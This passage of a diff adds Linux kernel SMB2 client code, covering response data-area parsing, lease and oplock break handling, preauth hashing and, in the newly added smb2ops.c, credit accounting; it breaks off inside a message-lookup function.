++ * Returns the pointer to the beginning of the data area. Length of the data
++ * area and the offset to it (from the beginning of the smb are also returned.
++ */
++char *
++smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
++{
++	*off = 0;
++	*len = 0;
++
++	/* error responses do not have data area */
++	if (shdr->Status && shdr->Status != STATUS_MORE_PROCESSING_REQUIRED &&
++	    (((struct smb2_err_rsp *)shdr)->StructureSize) ==
++						SMB2_ERROR_STRUCTURE_SIZE2_LE)
++		return NULL;
++
++	/*
++	 * Following commands have data areas so we have to get the location
++	 * of the data buffer offset and data buffer length for the particular
++	 * command.
++	 */
++	switch (shdr->Command) {
++	case SMB2_NEGOTIATE:
++		*off = le16_to_cpu(
++		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(
++		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferLength);
++		break;
++	case SMB2_SESSION_SETUP:
++		*off = le16_to_cpu(
++		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(
++		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferLength);
++		break;
++	case SMB2_CREATE:
++		*off = le32_to_cpu(
++		    ((struct smb2_create_rsp *)shdr)->CreateContextsOffset);
++		*len = le32_to_cpu(
++		    ((struct smb2_create_rsp *)shdr)->CreateContextsLength);
++		break;
++	case SMB2_QUERY_INFO:
++		*off = le16_to_cpu(
++		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferLength);
++		break;
++	case SMB2_READ:
++		/* TODO: is this a bug ? */
++		*off = ((struct smb2_read_rsp *)shdr)->DataOffset;
++		*len = le32_to_cpu(((struct smb2_read_rsp *)shdr)->DataLength);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		*off = le16_to_cpu(
++		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferLength);
++		break;
++	case SMB2_IOCTL:
++		*off = le32_to_cpu(
++		  ((struct smb2_ioctl_rsp *)shdr)->OutputOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_ioctl_rsp *)shdr)->OutputCount);
++		break;
++	case SMB2_CHANGE_NOTIFY:
++		*off = le16_to_cpu(
++		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferLength);
++		break;
++	default:
++		cifs_dbg(VFS, "no length check for command %d\n", le16_to_cpu(shdr->Command));
++		break;
++	}
++
++	/*
++	 * Invalid length or offset probably means data area is invalid, but
++	 * we have little choice but to ignore the data area in this case.
++	 */
++	if (*off > 4096) {
++		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
++		*len = 0;
++		*off = 0;
++	} else if (*off < 0) {
++		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
++			 *off);
++		*off = 0;
++		*len = 0;
++	} else if (*len < 0) {
++		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
++			 *len);
++		*len = 0;
++	} else if (*len > 128 * 1024) {
++		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
++		*len = 0;
++	}
++
++	/* return pointer to beginning of data area, ie offset from SMB start */
++	if ((*off != 0) && (*len != 0))
++		return (char *)shdr + *off;
++	else
++		return NULL;
++}
++
++/*
++ * Calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message.
++ */
++unsigned int
++smb2_calc_size(void *buf)
++{
++	struct smb2_pdu *pdu = buf;
++	struct smb2_hdr *shdr = &pdu->hdr;
++	int offset; /* the offset from the beginning of SMB to data area */
++	int data_length; /* the length of the variable length data area */
++	/* Structure Size has already been checked to make sure it is 64 */
++	int len = le16_to_cpu(shdr->StructureSize);
++
++	/*
++	 * StructureSize2, ie length of fixed parameter area has already
++	 * been checked to make sure it is the correct length.
++	 */
++	len += le16_to_cpu(pdu->StructureSize2);
++
++	if (has_smb2_data_area[le16_to_cpu(shdr->Command)] == false)
++		goto calc_size_exit;
++
++	smb2_get_data_area_len(&offset, &data_length, shdr);
++	cifs_dbg(FYI, "SMB2 data length %d offset %d\n", data_length, offset);
++
++	if (data_length > 0) {
++		/*
++		 * Check to make sure that data area begins after fixed area,
++		 * Note that last byte of the fixed area is part of data area
++		 * for some commands, typically those with odd StructureSize,
++		 * so we must add one to the calculation.
++		 */
++		if (offset + 1 < len) {
++			cifs_dbg(VFS, "data area offset %d overlaps SMB2 header %d\n",
++				 offset + 1, len);
++			data_length = 0;
++		} else {
++			len = offset + data_length;
++		}
++	}
++calc_size_exit:
++	cifs_dbg(FYI, "SMB2 len %d\n", len);
++	return len;
++}
++
++/* Note: caller must free return buffer */
++__le16 *
++cifs_convert_path_to_utf16(const char *from, struct cifs_sb_info *cifs_sb)
++{
++	int len;
++	const char *start_of_path;
++	__le16 *to;
++	int map_type;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		map_type = SFM_MAP_UNI_RSVD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		map_type = SFU_MAP_UNI_RSVD;
++	else
++		map_type = NO_MAP_UNI_RSVD;
++
++	/* Windows doesn't allow paths beginning with \ */
++	if (from[0] == '\\')
++		start_of_path = from + 1;
++
++	/* SMB311 POSIX extensions paths do not include leading slash */
++	else if (cifs_sb_master_tlink(cifs_sb) &&
++		 cifs_sb_master_tcon(cifs_sb)->posix_extensions &&
++		 (from[0] == '/')) {
++		start_of_path = from + 1;
++	} else
++		start_of_path = from;
++
++	to = cifs_strndup_to_utf16(start_of_path, PATH_MAX, &len,
++				   cifs_sb->local_nls, map_type);
++	return to;
++}
++
++__le32
++smb2_get_lease_state(struct cifsInodeInfo *cinode)
++{
++	__le32 lease = 0;
++
++	if (CIFS_CACHE_WRITE(cinode))
++		lease |= SMB2_LEASE_WRITE_CACHING_LE;
++	if (CIFS_CACHE_HANDLE(cinode))
++		lease |= SMB2_LEASE_HANDLE_CACHING_LE;
++	if (CIFS_CACHE_READ(cinode))
++		lease |= SMB2_LEASE_READ_CACHING_LE;
++	return lease;
++}
++
++struct smb2_lease_break_work {
++	struct work_struct lease_break;
++	struct tcon_link *tlink;
++	__u8 lease_key[16];
++	__le32 lease_state;
++};
++
++static void
++cifs_ses_oplock_break(struct work_struct *work)
++{
++	struct smb2_lease_break_work *lw = container_of(work,
++				struct smb2_lease_break_work, lease_break);
++	int rc = 0;
++
++	rc = SMB2_lease_break(0, tlink_tcon(lw->tlink), lw->lease_key,
++			      lw->lease_state);
++
++	cifs_dbg(FYI, "Lease release rc %d\n", rc);
++	cifs_put_tlink(lw->tlink);
++	kfree(lw);
++}
++
++static void
++smb2_queue_pending_open_break(struct tcon_link *tlink, __u8 *lease_key,
++			      __le32 new_lease_state)
++{
++	struct smb2_lease_break_work *lw;
++
++	lw = kmalloc(sizeof(struct smb2_lease_break_work), GFP_KERNEL);
++	if (!lw) {
++		cifs_put_tlink(tlink);
++		return;
++	}
++
++	INIT_WORK(&lw->lease_break, cifs_ses_oplock_break);
++	lw->tlink = tlink;
++	lw->lease_state = new_lease_state;
++	memcpy(lw->lease_key, lease_key, SMB2_LEASE_KEY_SIZE);
++	queue_work(cifsiod_wq, &lw->lease_break);
++}
++
++static bool
++smb2_tcon_has_lease(struct cifs_tcon *tcon, struct smb2_lease_break *rsp)
++{
++	__u8 lease_state;
++	struct cifsFileInfo *cfile;
++	struct cifsInodeInfo *cinode;
++	int ack_req = le32_to_cpu(rsp->Flags &
++				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
++
++	lease_state = le32_to_cpu(rsp->NewLeaseState);
++
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		cinode = CIFS_I(d_inode(cfile->dentry));
++
++		if (memcmp(cinode->lease_key, rsp->LeaseKey,
++							SMB2_LEASE_KEY_SIZE))
++			continue;
++
++		cifs_dbg(FYI, "found in the open list\n");
++		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
++			 lease_state);
++
++		if (ack_req)
++			cfile->oplock_break_cancelled = false;
++		else
++			cfile->oplock_break_cancelled = true;
++
++		set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
++
++		cfile->oplock_epoch = le16_to_cpu(rsp->Epoch);
++		cfile->oplock_level = lease_state;
++
++		cifs_queue_oplock_break(cfile);
++		return true;
++	}
++
++	return false;
++}
++
++static struct cifs_pending_open *
++smb2_tcon_find_pending_open_lease(struct cifs_tcon *tcon,
++				  struct smb2_lease_break *rsp)
++{
++	__u8 lease_state = le32_to_cpu(rsp->NewLeaseState);
++	int ack_req = le32_to_cpu(rsp->Flags &
++				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
++	struct cifs_pending_open *open;
++	struct cifs_pending_open *found = NULL;
++
++	list_for_each_entry(open, &tcon->pending_opens, olist) {
++		if (memcmp(open->lease_key, rsp->LeaseKey,
++			   SMB2_LEASE_KEY_SIZE))
++			continue;
++
++		if (!found && ack_req) {
++			found = open;
++		}
++
++		cifs_dbg(FYI, "found in the pending open list\n");
++		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
++			 lease_state);
++
++		open->oplock = lease_state;
++	}
++
++	return found;
++}
++
++static bool
++smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_lease_break *rsp = (struct smb2_lease_break *)buffer;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifs_pending_open *open;
++
++	cifs_dbg(FYI, "Checking for lease break\n");
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			spin_lock(&tcon->open_file_lock);
++			cifs_stats_inc(
++				       &tcon->stats.cifs_stats.num_oplock_brks);
++			if (smb2_tcon_has_lease(tcon, rsp)) {
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			open = smb2_tcon_find_pending_open_lease(tcon,
++								 rsp);
++			if (open) {
++				__u8 lease_key[SMB2_LEASE_KEY_SIZE];
++				struct tcon_link *tlink;
++
++				tlink = cifs_get_tlink(open->tlink);
++				memcpy(lease_key, open->lease_key,
++				       SMB2_LEASE_KEY_SIZE);
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				smb2_queue_pending_open_break(tlink,
++							      lease_key,
++							      rsp->NewLeaseState);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++
++			if (cached_dir_lease_break(tcon, rsp->LeaseKey)) {
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "Can not process lease break - no lease matched\n");
++	trace_smb3_lease_not_found(le32_to_cpu(rsp->CurrentLeaseState),
++				   le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
++				   le64_to_cpu(rsp->hdr.SessionId),
++				   *((u64 *)rsp->LeaseKey),
++				   *((u64 *)&rsp->LeaseKey[8]));
++
++	return false;
++}
++
++bool
++smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_oplock_break *rsp = (struct smb2_oplock_break *)buffer;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsInodeInfo *cinode;
++	struct cifsFileInfo *cfile;
++
++	cifs_dbg(FYI, "Checking for oplock break\n");
++
++	if (rsp->hdr.Command != SMB2_OPLOCK_BREAK)
++		return false;
++
++	if (rsp->StructureSize !=
++				smb2_rsp_struct_sizes[SMB2_OPLOCK_BREAK_HE]) {
++		if (le16_to_cpu(rsp->StructureSize) == 44)
++			return smb2_is_valid_lease_break(buffer, server);
++		else
++			return false;
++	}
++
++	cifs_dbg(FYI, "oplock level 0x%x\n", rsp->OplockLevel);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++
++			spin_lock(&tcon->open_file_lock);
++			list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++				if (rsp->PersistentFid !=
++				    cfile->fid.persistent_fid ||
++				    rsp->VolatileFid !=
++				    cfile->fid.volatile_fid)
++					continue;
++
++				cifs_dbg(FYI, "file id match, oplock break\n");
++				cifs_stats_inc(
++				    &tcon->stats.cifs_stats.num_oplock_brks);
++				cinode = CIFS_I(d_inode(cfile->dentry));
++				spin_lock(&cfile->file_info_lock);
++				if (!CIFS_CACHE_WRITE(cinode) &&
++				    rsp->OplockLevel == SMB2_OPLOCK_LEVEL_NONE)
++					cfile->oplock_break_cancelled = true;
++				else
++					cfile->oplock_break_cancelled = false;
++
++				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
++					&cinode->flags);
++
++				cfile->oplock_epoch = 0;
++				cfile->oplock_level = rsp->OplockLevel;
++
++				spin_unlock(&cfile->file_info_lock);
++
++				cifs_queue_oplock_break(cfile);
++
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "No file id matched, oplock break ignored\n");
++	trace_smb3_oplock_not_found(0 /* no xid */, rsp->PersistentFid,
++				  le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
++				  le64_to_cpu(rsp->hdr.SessionId));
++
++	return true;
++}
++
++void
++smb2_cancelled_close_fid(struct work_struct *work)
++{
++	struct close_cancelled_open *cancelled = container_of(work,
++					struct close_cancelled_open, work);
++	struct cifs_tcon *tcon = cancelled->tcon;
++	int rc;
++
++	if (cancelled->mid)
++		cifs_tcon_dbg(VFS, "Close unmatched open for MID:%llu\n",
++			      cancelled->mid);
++	else
++		cifs_tcon_dbg(VFS, "Close interrupted close\n");
++
++	rc = SMB2_close(0, tcon, cancelled->fid.persistent_fid,
++			cancelled->fid.volatile_fid);
++	if (rc)
++		cifs_tcon_dbg(VFS, "Close cancelled mid failed rc:%d\n", rc);
++
++	cifs_put_tcon(tcon);
++	kfree(cancelled);
++}
++
++/*
++ * Caller should already has an extra reference to @tcon
++ * This function is used to queue work to close a handle to prevent leaks
++ * on the server.
++ * We handle two cases. If an open was interrupted after we sent the
++ * SMB2_CREATE to the server but before we processed the reply, and second
++ * if a close was interrupted before we sent the SMB2_CLOSE to the server.
++ */
++static int
++__smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
++			    __u64 persistent_fid, __u64 volatile_fid)
++{
++	struct close_cancelled_open *cancelled;
++
++	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
++	if (!cancelled)
++		return -ENOMEM;
++
++	cancelled->fid.persistent_fid = persistent_fid;
++	cancelled->fid.volatile_fid = volatile_fid;
++	cancelled->tcon = tcon;
++	cancelled->cmd = cmd;
++	cancelled->mid = mid;
++	INIT_WORK(&cancelled->work, smb2_cancelled_close_fid);
++	WARN_ON(queue_work(cifsiod_wq, &cancelled->work) == false);
++
++	return 0;
++}
++
++int
++smb2_handle_cancelled_close(struct cifs_tcon *tcon, __u64 persistent_fid,
++			    __u64 volatile_fid)
++{
++	int rc;
++
++	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
++	spin_lock(&cifs_tcp_ses_lock);
++	if (tcon->tc_count <= 0) {
++		struct TCP_Server_Info *server = NULL;
++
++		WARN_ONCE(tcon->tc_count < 0, "tcon refcount is negative");
++		spin_unlock(&cifs_tcp_ses_lock);
++
++		if (tcon->ses)
++			server = tcon->ses->server;
++
++		cifs_server_dbg(FYI, "tid=0x%x: tcon is closing, skipping async close retry of fid %llu %llu\n",
++				tcon->tid, persistent_fid, volatile_fid);
++
++		return 0;
++	}
++	tcon->tc_count++;
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	rc = __smb2_handle_cancelled_cmd(tcon, SMB2_CLOSE_HE, 0,
++					 persistent_fid, volatile_fid);
++	if (rc)
++		cifs_put_tcon(tcon);
++
++	return rc;
++}
++
++int
++smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *hdr = mid->resp_buf;
++	struct smb2_create_rsp *rsp = mid->resp_buf;
++	struct cifs_tcon *tcon;
++	int rc;
++
++	if ((mid->optype & CIFS_CP_CREATE_CLOSE_OP) || hdr->Command != SMB2_CREATE ||
++	    hdr->Status != STATUS_SUCCESS)
++		return 0;
++
++	tcon = smb2_find_smb_tcon(server, le64_to_cpu(hdr->SessionId),
++				  le32_to_cpu(hdr->Id.SyncId.TreeId));
++	if (!tcon)
++		return -ENOENT;
++
++	rc = __smb2_handle_cancelled_cmd(tcon,
++					 le16_to_cpu(hdr->Command),
++					 le64_to_cpu(hdr->MessageId),
++					 rsp->PersistentFileId,
++					 rsp->VolatileFileId);
++	if (rc)
++		cifs_put_tcon(tcon);
++
++	return rc;
++}
++
++/**
++ * smb311_update_preauth_hash - update @ses hash with the packet data in @iov
++ *
++ * Assumes @iov does not contain the rfc1002 length and iov[0] has the
++ * SMB2 header.
++ *
++ * @ses:	server session structure
++ * @server:	pointer to server info
++ * @iov:	array containing the SMB request we will send to the server
++ * @nvec:	number of array entries for the iov
++ */
++int
++smb311_update_preauth_hash(struct cifs_ses *ses, struct TCP_Server_Info *server,
++			   struct kvec *iov, int nvec)
++{
++	int i, rc;
++	struct smb2_hdr *hdr;
++	struct shash_desc *sha512 = NULL;
++
++	hdr = (struct smb2_hdr *)iov[0].iov_base;
++	/* neg prot are always taken */
++	if (hdr->Command == SMB2_NEGOTIATE)
++		goto ok;
++
++	/*
++	 * If we process a command which wasn't a negprot it means the
++	 * neg prot was already done, so the server dialect was set
++	 * and we can test it. Preauth requires 3.1.1 for now.
++	 */
++	if (server->dialect != SMB311_PROT_ID)
++		return 0;
++
++	if (hdr->Command != SMB2_SESSION_SETUP)
++		return 0;
++
++	/* skip last sess setup response */
++	if ((hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++	    && (hdr->Status == NT_STATUS_OK
++		|| (hdr->Status !=
++		    cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))))
++		return 0;
++
++ok:
++	rc = smb311_crypto_shash_allocate(server);
++	if (rc)
++		return rc;
++
++	sha512 = server->secmech.sha512;
++	rc = crypto_shash_init(sha512);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init sha512 shash\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_update(sha512, ses->preauth_sha_hash,
++				 SMB2_PREAUTH_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update sha512 shash\n", __func__);
++		return rc;
++	}
++
++	for (i = 0; i < nvec; i++) {
++		rc = crypto_shash_update(sha512, iov[i].iov_base, iov[i].iov_len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update sha512 shash\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	rc = crypto_shash_final(sha512, ses->preauth_sha_hash);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not finalize sha512 shash\n",
++			 __func__);
++		return rc;
++	}
++
++	return 0;
++}
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+new file mode 100644
+index 0000000000000..d512440d35b6f
+--- /dev/null
++++ b/fs/smb/client/smb2ops.c
+@@ -0,0 +1,5805 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *  SMB2 version specific operations
++ *
++ *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
++ */
++
++#include <linux/pagemap.h>
++#include <linux/vfs.h>
++#include <linux/falloc.h>
++#include <linux/scatterlist.h>
++#include <linux/uuid.h>
++#include <linux/sort.h>
++#include <crypto/aead.h>
++#include <linux/fiemap.h>
++#include <uapi/linux/magic.h>
++#include "cifsfs.h"
++#include "cifsglob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "cifs_ioctl.h"
++#include "smbdirect.h"
++#include "fscache.h"
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/* Change credits for different ops and return the total number of credits */
++static int
++change_conf(struct TCP_Server_Info *server)
++{
++	server->credits += server->echo_credits + server->oplock_credits;
++	server->oplock_credits = server->echo_credits = 0;
++	switch (server->credits) {
++	case 0:
++		return 0;
++	case 1:
++		server->echoes = false;
++		server->oplocks = false;
++		break;
++	case 2:
++		server->echoes = true;
++		server->oplocks = false;
++		server->echo_credits = 1;
++		break;
++	default:
++		server->echoes = true;
++		if (enable_oplocks) {
++			server->oplocks = true;
++			server->oplock_credits = 1;
++		} else
++			server->oplocks = false;
++
++		server->echo_credits = 1;
++	}
++	server->credits -= server->echo_credits + server->oplock_credits;
++	return server->credits + server->echo_credits + server->oplock_credits;
++}
++
++static void
++smb2_add_credits(struct TCP_Server_Info *server,
++		 const struct cifs_credits *credits, const int optype)
++{
++	int *val, rc = -1;
++	int scredits, in_flight;
++	unsigned int add = credits->value;
++	unsigned int instance = credits->instance;
++	bool reconnect_detected = false;
++	bool reconnect_with_invalid_credits = false;
++
++	spin_lock(&server->req_lock);
++	val = server->ops->get_credits_field(server, optype);
++
++	/* eg found case where write overlapping reconnect messed up credits */
++	if (((optype & CIFS_OP_MASK) == CIFS_NEG_OP) && (*val != 0))
++		reconnect_with_invalid_credits = true;
++
++	if ((instance == 0) || (instance == server->reconnect_instance))
++		*val += add;
++	else
++		reconnect_detected = true;
++
++	if (*val > 65000) {
++		*val = 65000; /* Don't get near 64K credits, avoid srv bugs */
++		pr_warn_once("server overflowed SMB3 credits\n");
++		trace_smb3_overflow_credits(server->CurrentMid,
++					    server->conn_id, server->hostname, *val,
++					    add, server->in_flight);
++	}
++	server->in_flight--;
++	if (server->in_flight == 0 &&
++	   ((optype & CIFS_OP_MASK) != CIFS_NEG_OP) &&
++	   ((optype & CIFS_OP_MASK) != CIFS_SESS_OP))
++		rc = change_conf(server);
++	/*
++	 * Sometimes server returns 0 credits on oplock break ack - we need to
++	 * rebalance credits in this case.
++	 */
++	else if (server->in_flight > 0 && server->oplock_credits == 0 &&
++		 server->oplocks) {
++		if (server->credits > 1) {
++			server->credits--;
++			server->oplock_credits++;
++		}
++	}
++	scredits = *val;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++
++	if (reconnect_detected) {
++		trace_smb3_reconnect_detected(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++
++		cifs_dbg(FYI, "trying to put %d credits from the old server instance %d\n",
++			 add, instance);
++	}
++
++	if (reconnect_with_invalid_credits) {
++		trace_smb3_reconnect_with_invalid_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++		cifs_dbg(FYI, "Negotiate operation when server credits is non-zero. Optype: %d, server credits: %d, credits added: %d\n",
++			 optype, scredits, add);
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect
++	    || server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return;
++	}
++	spin_unlock(&server->srv_lock);
++
++	switch (rc) {
++	case -1:
++		/* change_conf hasn't been executed */
++		break;
++	case 0:
++		cifs_server_dbg(VFS, "Possible client or server bug - zero credits\n");
++		break;
++	case 1:
++		cifs_server_dbg(VFS, "disabling echoes and oplocks\n");
++		break;
++	case 2:
++		cifs_dbg(FYI, "disabling oplocks\n");
++		break;
++	default:
++		/* change_conf rebalanced credits for different types */
++		break;
++	}
++
++	trace_smb3_add_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++	cifs_dbg(FYI, "%s: added %u credits total=%d\n", __func__, add, scredits);
++}
++
++static void
++smb2_set_credits(struct TCP_Server_Info *server, const int val)
++{
++	int scredits, in_flight;
++
++	spin_lock(&server->req_lock);
++	server->credits = val;
++	if (val == 1)
++		server->reconnect_instance++;
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++
++	trace_smb3_set_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, val, in_flight);
++	cifs_dbg(FYI, "%s: set %u credits\n", __func__, val);
++
++	/* don't log while holding the lock */
++	if (val == 1)
++		cifs_dbg(FYI, "set credits to 1 due to smb2 reconnect\n");
++}
++
++static int *
++smb2_get_credits_field(struct TCP_Server_Info *server, const int optype)
++{
++	switch (optype) {
++	case CIFS_ECHO_OP:
++		return &server->echo_credits;
++	case CIFS_OBREAK_OP:
++		return &server->oplock_credits;
++	default:
++		return &server->credits;
++	}
++}
++
++static unsigned int
++smb2_get_credits(struct mid_q_entry *mid)
++{
++	return mid->credits_received;
++}
++
++static int
++smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
++		      unsigned int *num, struct cifs_credits *credits)
++{
++	int rc = 0;
++	unsigned int scredits, in_flight;
++
++	spin_lock(&server->req_lock);
++	while (1) {
++		if (server->credits <= 0) {
++			spin_unlock(&server->req_lock);
++			cifs_num_waiters_inc(server);
++			rc = wait_event_killable(server->request_q,
++				has_credits(server, &server->credits, 1));
++			cifs_num_waiters_dec(server);
++			if (rc)
++				return rc;
++			spin_lock(&server->req_lock);
++		} else {
++			spin_unlock(&server->req_lock);
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus == CifsExiting) {
++				spin_unlock(&server->srv_lock);
++				return -ENOENT;
++			}
++			spin_unlock(&server->srv_lock);
++
++			spin_lock(&server->req_lock);
++			scredits = server->credits;
++			/* can deadlock with reopen */
++			if (scredits <= 8) {
++				*num = SMB2_MAX_BUFFER_SIZE;
++				credits->value = 0;
++				credits->instance = 0;
++				break;
++			}
++
++			/* leave some credits for reopen and other ops */
++			scredits -= 8;
++			*num = min_t(unsigned int, size,
++				     scredits * SMB2_MAX_BUFFER_SIZE);
++
++			credits->value =
++				DIV_ROUND_UP(*num, SMB2_MAX_BUFFER_SIZE);
++			credits->instance = server->reconnect_instance;
++			server->credits -= credits->value;
++			server->in_flight++;
++			if (server->in_flight > server->max_in_flight)
++				server->max_in_flight = server->in_flight;
++			break;
++		}
++	}
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++
++	trace_smb3_wait_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, -(credits->value), in_flight);
++	cifs_dbg(FYI, "%s: removed %u credits total=%d\n",
++			__func__, credits->value, scredits);
++
++	return rc;
++}
++
++static int
++smb2_adjust_credits(struct TCP_Server_Info *server,
++		    struct cifs_credits *credits,
++		    const unsigned int payload_size)
++{
++	int new_val = DIV_ROUND_UP(payload_size, SMB2_MAX_BUFFER_SIZE);
++	int scredits, in_flight;
++
++	if (!credits->value || credits->value == new_val)
++		return 0;
++
++	if (credits->value < new_val) {
++		trace_smb3_too_many_credits(server->CurrentMid,
++				server->conn_id, server->hostname, 0, credits->value - new_val, 0);
++		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
++				credits->value, new_val);
++
++		return -ENOTSUPP;
++	}
++
++	spin_lock(&server->req_lock);
++
++	if (server->reconnect_instance != credits->instance) {
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++
++		trace_smb3_reconnect_detected(server->CurrentMid,
++			server->conn_id, server->hostname, scredits,
++			credits->value - new_val, in_flight);
++		cifs_server_dbg(VFS, "trying to return %d credits to old session\n",
++			 credits->value - new_val);
++		return -EAGAIN;
++	}
++
++	server->credits += credits->value - new_val;
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++
++	trace_smb3_adj_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits,
++			credits->value - new_val, in_flight);
++	cifs_dbg(FYI, "%s: adjust added %u credits total=%d\n",
++			__func__, credits->value - new_val, scredits);
++
++	credits->value = new_val;
++
++	return 0;
++}
++
++static __u64
++smb2_get_next_mid(struct TCP_Server_Info *server)
++{
++	__u64 mid;
++	/* for SMB2 we need the current value */
++	spin_lock(&server->mid_lock);
++	mid = server->CurrentMid++;
++	spin_unlock(&server->mid_lock);
++	return mid;
++}
++
++static void
++smb2_revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
++{
++	spin_lock(&server->mid_lock);
++	if (server->CurrentMid >= val)
++		server->CurrentMid -= val;
++	spin_unlock(&server->mid_lock);
++}
++
++static struct mid_q_entry *
++__smb2_find_mid(struct TCP_Server_Info *server, char *buf, bool dequeue)
++{
++	struct mid_q_entry *mid;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
++
++	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		cifs_server_dbg(VFS, "Encrypted frame parsing not supported yet\n");
++		return NULL;
